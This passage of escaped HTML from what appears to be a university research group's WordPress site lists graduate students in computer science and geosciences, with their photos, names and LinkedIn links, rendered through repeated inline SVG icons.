0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-854 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-anupam-e1697206626249.jpg\" class=\"wp-image-1747 style-854-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anupam Sarker</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-902 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-855 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anupam-sarker-b164b412a\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Ardavan-e1697206676649.jpg\" class=\"wp-image-1748 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c94-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c95\" class=\"h-global-transition-all h-heading style-850 style-local-182-c95 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c95\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ardavan Sassini</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c96\" class=\"h-text h-text-component style-851 style-local-182-c96 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c97\" class=\"h-text h-text-component style-902 style-local-182-c97 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c98\" class=\"style-855 style-local-182-c98 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ardavansassani\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c99-outer\">\n            <div data-colibri-id=\"182-c99\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c99 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c100\" class=\"d-block style-854 style-local-182-c100 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-Jean-e1697206801281.jpg\" class=\"wp-image-1750 style-854-image style-local-182-c100-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c100-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c101\" class=\"h-global-transition-all h-heading style-850 style-local-182-c101 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c101\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Jean Guo</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c102\" class=\"h-text h-text-component style-851 style-local-182-c102 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Student</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c103\" class=\"h-text h-text-component style-902 style-local-182-c103 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c104-outer\">\n            <div data-colibri-id=\"182-c104\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c104 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c105\" class=\"d-block style-854 style-local-182-c105 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Basit-e1697206890221.jpg\" class=\"wp-image-1752 style-854-image style-local-182-c105-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c105-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c106\" class=\"h-global-transition-all h-heading style-850 style-local-182-c106 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c106\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Basit Damilare Amuda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c107\" class=\"h-text h-text-component style-851 style-local-182-c107 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c108\" class=\"h-text h-text-component style-902 style-local-182-c108 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c109\" class=\"style-855 style-local-182-c109 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"http://linkedin.com/in/basit-amuda-227098238\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c110-outer\">\n            <div data-colibri-id=\"182-c110\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c110 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c111\" class=\"d-block style-854 style-local-182-c111 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c111-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c111-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c112\" class=\"h-global-transition-all h-heading style-850 style-local-182-c112 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c112\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sara Edwards</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c113\" class=\"h-text h-text-component style-851 style-local-182-c113 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c114\" class=\"h-text h-text-component style-902 style-local-182-c114 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c115\" class=\"style-855 style-local-182-c115 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sara-edwards-691b8331/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c116-outer\">\n            <div data-colibri-id=\"182-c116\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c116 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c117\" class=\"d-block style-854 style-local-182-c117 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\" class=\"wp-image-1756 style-854-image style-local-182-c117-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c117-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c118\" class=\"h-global-transition-all h-heading style-850 style-local-182-c118 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c118\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ryan Garland</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c119\" class=\"h-text h-text-component style-851 style-local-182-c119 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c120\" class=\"h-text h-text-component style-902 style-local-182-c120 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c121\" class=\"style-855 style-local-182-c121 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/ryan-g-aa71a0163\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c122-outer\">\n            <div data-colibri-id=\"182-c122\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c122 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c123\" class=\"d-block style-854 style-local-182-c123 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Angelique-e1697207062254.jpg\" class=\"wp-image-1757 style-854-image style-local-182-c123-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c123-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c124\" class=\"h-global-transition-all h-heading style-850 style-local-182-c124 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c124\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Angelique Willis</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c125\" class=\"h-text h-text-component style-851 style-local-182-c125 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Master\'s Student</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c126\" class=\"h-text h-text-component style-902 style-local-182-c126 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c127\" class=\"style-855 style-local-182-c127 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/angelique-willis/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 